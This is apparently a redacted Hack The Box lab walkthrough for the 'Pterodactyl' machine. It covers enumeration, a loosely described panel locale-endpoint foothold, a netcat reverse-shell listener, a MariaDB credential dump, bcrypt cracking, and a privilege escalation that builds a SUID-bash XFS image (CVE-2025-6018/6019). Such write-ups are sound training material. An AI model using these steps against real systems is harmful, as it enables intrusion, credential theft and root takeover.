🎭Pterodactyl

https://app.hackthebox.com/machines/Pterodactyl

HTB — Pterodactyl (Redacted Walkthrough)

Notes on redaction:
Target IP is shown as Machine_IP in scan/output text and as <machine-ip> in commands.
Attacker/VPN IPs are redacted as <vpn-ip> (I removed all 10.10.x.x style IPs I saw for safety).

Recon

Nmap

sudo nmap -sCV <machine-ip>

Example output (redacted):

Nmap scan report for Machine_IP
Host is up.
PORT     STATE  SERVICE    VERSION
22/tcp   open   ssh        OpenSSH 9.6 (protocol 2.0)
80/tcp   open   http       nginx 1.21.5
443/tcp  closed https
8080/tcp closed http-proxy

Add hosts entries

echo '<machine-ip> pterodactyl.htb' | sudo tee -a /etc/hosts

Web Enumeration

Website

GET / HTTP/1.1
Host: pterodactyl.htb

The landing page is MonitorLand and references a Minecraft server subdomain (play.pterodactyl.htb) + a changelog.

Interesting file: `changelog.txt`

GET /changelog.txt HTTP/1.1
Host: pterodactyl.htb

The changelog mentions:

Pterodactyl Panel v1.11.10
PHP / extensions
“temporary PHP debugging via phpinfo()”
Links to a GHSA advisory

Directory / file brute force (ffuf)

ffuf -u http://pterodactyl.htb/FUZZ   -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt   -mc 200,301,302,403 -fc 404 -r

Found:

Public → 403

File brute force:

ffuf -u http://pterodactyl.htb/FUZZ   -w /usr/share/seclists/Discovery/Web-Content/raft-small-files.txt   -mc 200,403 -fs 0 -r

Found:

phpinfo.php → 200
.htaccess, .htpasswd → 403

`phpinfo.php` juicy bits

From phpinfo.php:

PHP 8.4.8
$_SERVER['SERVER_ADDR'] = Machine_IP
Document root: /var/www/html
Extra parsed ini directory: /etc/php8/conf.d (and many modules)

Subdomain Discovery

vhost fuzzing

ffuf -u http://pterodactyl.htb/   -H "Host: FUZZ.pterodactyl.htb"   -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt   -mc 200,301,302,403   -fs 1686 -r

Found:

panel.pterodactyl.htb → 200

Add it:

echo '<machine-ip> panel.pterodactyl.htb' | sudo tee -a /etc/hosts

Panel response + cookies

GET / HTTP/1.1
Host: panel.pterodactyl.htb

Response includes cookies like:

XSRF-TOKEN=...
pterodactyl_session=...

(I kept them as evidence; they’re long base64-ish blobs so I’m truncating here.)

Set-Cookie: XSRF-TOKEN=...; path=/; samesite=lax
Set-Cookie: pterodactyl_session=...; path=/; httponly; samesite=lax

Foothold

This section is intentionally high-level: you already captured the exact raw requests in your notes. I’m keeping the structure and evidence, but not adding new exploit payloads beyond what’s already in your walkthrough.

Locale endpoint abuse (panel)

Your notes show crafted requests to the locale loader under the panel host, including:

requests to GET /locales/locale.json?...
manipulating locale and namespace
leveraging the PHP environment (phpinfo showed PEAR is present)

Captured request examples are in your log.

Reverse shell listener

rlwrap nc -nlvp 4243

Example callback (redacted attacker IP):

connect to [<vpn-ip>] from (UNKNOWN) [Machine_IP] <port>
sh: no job control in this shell

Post-Exploitation

Local DB access

From the web shell, you queried the local MariaDB using known panel credentials and dumped panel users to a file:

/usr/bin/mariadb -u pterodactyl -pPteraPanel -h 127.0.0.1 --protocol=TCP panel   -e "SELECT id,email,password FROM users;" > /tmp/users.txt

cat /tmp/users.txt

Example output:

id  email                         password
2   headmonitor@pterodactyl.htb    $2y$10$...
3   phileasfogg3@pterodactyl.htb   $2y$10$...

Crack bcrypt (hashcat)

hashcat -m 3200 -a 0 hash /usr/share/wordlists/rockyou.txt --show

You recovered:

phileasfogg3@pterodactyl.htb : !QAZ2wsx

SSH as user

ssh phileasfogg3@pterodactyl.htb

Then:

cat user.txt

Privilege Escalation

Your notes reference:

CVE-2025-6018
CVE-2025-6019
A technique involving an XFS image + SUID bash, loop device creation (udisksctl loop-setup), and catching the mounted device path.

Key commands/evidence (as captured):

echo -e "XDG_SEAT=seat0\nXDG_VTNR=1" > ~/.pam_environment

Prepare payload image locally (abridged):

dd if=/dev/zero of=xfs.image bs=1M count=300
mkfs.xfs -q xfs.image
sudo mount -t xfs xfs.image /mnt
sudo cp bash /mnt/bash
sudo chown root:root /mnt/bash
sudo chmod 4755 /mnt/bash
sudo umount /mnt
scp xfs.image phileasfogg3@pterodactyl.htb:/tmp/xfs.image

Victim-side loop setup and watcher logic is shown in your notes, ending with a privileged read of /root/root.txt.

Flags

# User
cat ~/user.txt

# Root
cat /root/root.txt

Last updated 10 days ago

hashtagHTB — Pterodactyl (Redacted Walkthrough)

hashtagRecon

hashtagNmap

hashtagAdd hosts entries

hashtagWeb Enumeration

hashtagWebsite

hashtagInteresting file: changelog.txt

hashtagDirectory / file brute force (ffuf)

hashtagphpinfo.php juicy bits

hashtagSubdomain Discovery

hashtagvhost fuzzing

hashtagPanel response + cookies

hashtagFoothold

hashtagLocale endpoint abuse (panel)

hashtagReverse shell listener

hashtagPost-Exploitation

hashtagLocal DB access

hashtagCrack bcrypt (hashcat)

hashtagSSH as user

hashtagPrivilege Escalation

hashtagFlags

HTB — Pterodactyl (Redacted Walkthrough)

Recon

Nmap

Add hosts entries

Web Enumeration

Website

Interesting file: `changelog.txt`

Directory / file brute force (ffuf)

`phpinfo.php` juicy bits

Subdomain Discovery

vhost fuzzing

Panel response + cookies

Foothold

Locale endpoint abuse (panel)

Reverse shell listener

Post-Exploitation

Local DB access

Crack bcrypt (hashcat)

SSH as user

Privilege Escalation

Flags